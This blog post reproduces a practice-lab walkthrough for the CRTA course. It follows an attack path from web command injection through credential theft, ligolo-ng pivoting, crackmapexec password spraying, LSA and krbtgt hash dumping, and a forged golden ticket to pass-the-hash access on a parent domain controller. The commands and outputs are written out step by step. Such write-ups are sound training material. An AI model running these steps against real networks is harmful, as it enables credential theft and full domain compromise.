CRTA Labs Notes and Writeups.

-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 Unset
Unset
Scope Access
VPN: 10.10.200.0/24
External IP range: 192.168.80.0/24 [192.168.80.1 is out of scope]
Internal IP range: 192.168.98.0/24 [192.168.98.1 is out of scope]
Initial Access
Scanning Available Host
nmap -sn 192.168.80.0/24
PS : If you cannot discover the IPs, the server have enabled temporary ping
blocking. You can specifically scan the following IPs.
We can see 1 hosts up; Let’s scan 192.168.80.10
nmap -sC -sV 192.168.80.10
© All Rights Reserved CyberWarFare Labs

We can see port 80 open, let’s visit the website:
There we can see signup link we can try signing up the new account if it
works or not
© All Rights Reserved CyberWarFare Labs

We signed up with the random user pass and if we login with user and
password we were able to login into the dashboard.
Then we intercepted some of the traffic from the website and one
interesting field that we found was newsletter email field.
© All Rights Reserved CyberWarFare Labs

We found command execution in email field:
Let’s try to dump critical files like passwd etc.
There we found the privilege user with credential:
© All Rights Reserved CyberWarFare Labs

Unset
Let's ssh in the machine with the discovered credentials in the
“/etc/passwd” file.
ssh privilege@192.168.80.10
Credential was correct, we got the initial access on the machine.
© All Rights Reserved CyberWarFare Labs

Unset
Unset
Enumeration
Enumerating the machine gives few leads to move forward.
We saw this machine has another adapter as well connected in different
networks.
Now let’s search for browser history / bookmarks, it has been found that
the machine has Mozilla Firefox installed.
ls -la .mozilla/
cd .mozilla/firefox/
# The filename may vary on your infrastructure, identify & use accordingly
cd b2rri1qd.default-release
We will use sqlite3 to access the firefox database as follows :
sqlite3 places.sqlite
.tables
select * from moz_bookmarks;
We found some interesting credentials in the mozilla bookmarks database.
© All Rights Reserved CyberWarFare Labs

Unset
Unset
Bookmark:
We have to perform pivoting as 192.168.98.0/24 is not directly accessible
from the VPN network. We will utilize ligolo-ng for the same.
#Attacker Machine, download proxy & agent :
#Proxy
wget
https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_pr
oxy_0.4.3_Linux_64bit.tar.gz
#Agent
wget
https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_ag
ent_0.4.3_Linux_64bit.tar.gz
Setup the ligolo-ng proxy in the attacker machine & ligolo-ng in the victim
machine.
# Attacker Machine
sudo ip tuntap add user <your_user> mode tun ligolo
© All Rights Reserved CyberWarFare Labs

Unset
Unset
Unset
#Delete the 192.168.98.0/24 IP Range from the tun0 interface :
sudo ip route del 192.168.98.0/24 dev tun0
#Up the ligolo interface :
sudo ip link set ligolo up
#Add 192.168.98.0/24 IP range to the ligolo interface :
sudo ip route add 192.168.98.0/24 dev ligolo
Confirm the route on your attacker machine. The internal IP range is now
added in the route.
Start the proxy on the attacker server
./proxy -selfcert -laddr 0.0.0.0:443
Transfer the agent on the victim machine & start the connection
#Replace this with your attacker IP address.
./agent -connect 10.10.200.X:443 -ignore-cert
On the server side, we can check that the agent connected successfully.
© All Rights Reserved CyberWarFare Labs

Unset
On the ligolo-ng proxy, check the session & start the tunnel.
session
list_tunnels
start
Now, fire up a new terminal & check that we can now access the internal IP
range 192.168.98.0/24
© All Rights Reserved CyberWarFare Labs

Unset
Unset
Initial Access
Let's scan first for the available host in the internal network
[192.168.98.0/24]. We can see three hosts are up with nmap:
nmap -sn 192.168.98.0/24
Let’s spray the discovered credentials in the network using crackmapexec
toolkit.
#Create a txt file with live hosts in the 192.168.98.0/24 network :
cat target.txt
192.168.98.2
192.168.98.15
192.168.98.30
192.168.98.120
© All Rights Reserved CyberWarFare Labs

Unset
Unset
#Now, use cme to spray the credentials :
crackmapexec --verbose smb target.txt -u john -p User1@#$%6
Great! It seems that the user “John” is local administrator at “192.168.98.30”
machine, the name is “MGMT”
Now, let’s dump the LSA process using crackmapexec toolkit, it utilizes
impacket's module secretsdump for the same.
crackmapexec --verbose smb 192.168.98.30 -u john -p User1@#$%6 --lsa
Sweet!! Got the clear-text credentials of the user “corpmngr
Again, let’s spray the credentials in the network using crackmapexec
toolkit
© All Rights Reserved CyberWarFare Labs

Unset
Unset
Unset
# Spray again in the network with the new credentials :
crackmapexec --verbose smb target.txt -u corpmngr -p 'User4&*&*'
Awesome, we got the credentials working as local administrator in the
CDC” machine at “192.168.98.120”
Since we know the machine name & the domain, let’s update the same on
our hosts file.
sudo nano /etc/hosts
192.168.98.2 warfare.corp dc01.warfare.corp
192.168.98.120 child.warfare.corp cdc.child.warfare.corp
We are local administrator in the Child Domain Controller. Let's extract the
hash of “krbtgt” account using impacket secretsdump script. We will forge
a golden ticket to compromise the Parent Domain Controller.
secretsdump.py -debug child/corpmngr:'User4&*&*'@cdc.child.warfare.corp
-just-dc-user 'child\krbtgt'
#Results :
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:e57dd34c1871b7a23fb17a77dec9b900
krbtgt:aes256-cts-hmac-sha1-96:ad8c273289e4c511b4363c43c08f9a5aff06f8fe002c1
0ab1031da11152611b2
© All Rights Reserved CyberWarFare Labs

Unset
We will perform SID Extraction using lookupsid python script.
lookupsid.py child/corpmngr:'User4&*&*'@child.warfare.corp
lookupsid.py child/corpmngr:'User4&*&*'@warfare.corp
So far we have got the following details :
© All Rights Reserved CyberWarFare Labs

Unset
Unset
Unset
#Result :
1. krbtgt aes256 Hash
ad8c273289e4c511b4363c43c08f9a5aff06f8fe002c10ab1031da11152611b2
2. Parent SID : S-1-5-21-3375883379-808943238-3239386119
3. Child SID : S-1-5-21-3754860944-83624914-1883974761
We will forge golden ticket using ticketer as follows :
ticketer.py -domain child.warfare.corp -aesKey
ad8c273289e4c511b4363c43c08f9a5aff06f8fe002c10ab1031da11152611b2 -domain-sid
S-1-5-21-3754860944-83624914-1883974761 -groups 516 -user-id 1106 -extra-sid
S-1-5-21-3375883379-808943238-3239386119-516,S-1-5-9 'corpmngr'
Let’s set the ccache file to the environment variable.
export KRB5CCNAME=corpmngr.ccache
© All Rights Reserved CyberWarFare Labs

Unset
Unset
Unset
Request Service Ticket using the ccache file.
getST.py -spn 'CIFS/dc01.warfare.corp' -k -no-pass
child.warfare.corp/corpmngr -debug
export KRB5CCNAME=corpmngr@CIFS_dc01.warfare.corp@WARFARE.CORP.ccache
Parent Domain Controller
We got the CIFS ticket of the Domain Controller as “corpmngr”, let’s extract
the Administrator password using secretsdump script.
secretsdump.py -k -no-pass dc01.warfare.corp -just-dc-user
'warfare\Administrator' -debug
© All Rights Reserved CyberWarFare Labs

Unset
Let’s access the Administrator credentials :
psexec.py -debug 'warfare/Administrator@dc01.warfare.corp' -hashes
aad3b435b51404eeaad3b435b51404ee:a2f7b77b62cd97161e18be2ffcfdfd60
If you like the practice lab, please give us a shoutout. Also, once you are
ready, feel free to drop an email to the support team
(support@cyberwarfare.live) providing your availability in British
Summer Time (BST) in date & time format

 

Comments

Post a Comment

Popular posts from this blog

Windows Privilege Escalation THM Room

-
Image
Windows Privilege Escalation     INTRODUCTION During a penetration test, you will often have access to some Windows hosts with an unprivileged user. Unprivileged users will hold limited access, including their files and folders only, and have no means to perform administrative tasks on the host, preventing you from having complete control over your target. This room covers fundamental techniques that attackers can use to elevate privileges in a Windows environment, allowing you to use any initial unprivileged foothold on a host to escalate to an administrator account, where possible.  If you want to brush up on your skills first, you can have a look through the   Windows Fundamentals Module   or the   Hacking Windows Module .   Windows Privilege Escalation Windows Privilege Escalation Simply put, privilege escalation consists of using given access to a host with "user A" and leveraging it to gain access to "user B" by abusing a weakness in the ta...
Read more

Linux Privilege Escalation THM Room

-
Image
 Linux Privilege Escalation All Task Solution All Task Solution 2   Privilege escalation is a journey. There are no silver bullets, and much depends on the specific configuration of the target system. The kernel version, installed applications, supported programming languages, other users' passwords are a few key elements that will affect your road to the root shell. This room was designed to cover the main privilege escalation vectors and give you a better understanding of the process. This new skill will be an essential part of your arsenal whether you are participating in CTFs, taking certification exams, or working as a penetration tester.   What does "privilege escalation" mean? At it's core, Privilege Escalation usually involves going from a lower permission account to a higher permission one. More technically, it's the exploitation of a vulnerability, design flaw, or configuration oversight in an operating system or application to ga...
Read more

Eternal blue Using Termux

-
Image
  Introduction On 14 April 2017, a hacker group know by the name of Shadow Brokers leaked exploitation toolkit used by the National Security Agency (NSA). The leak was also used as part of a worldwide WannaCry ransomware attack. EternalBlue is also an exploit developed and used by the NSA according to former NSA employees. Lab Environment Target Machine: Windows 7 Ultimate x64 bit Attacker Machine: Android 5.1 What is EternalBlue EternalBlue actually exploits a vulnerabili t y found in Server Message Block (SMB) protocol of Microsoft Windows various platforms. This vulnerability can be found under CVE-2017–0144 in the CVE catalog.The most severe of the vulnerabilities could allow remote code execution if an attacker sends specially crafted messages to a Microsoft Server Message Block 1.0 (SMBv1) server. Windows 7 Operating with Release Effected by EternalBlue For Full List of Operating System Effected by Eternal Blue please : Click Here Installing Metasploit Framework on ...
Read more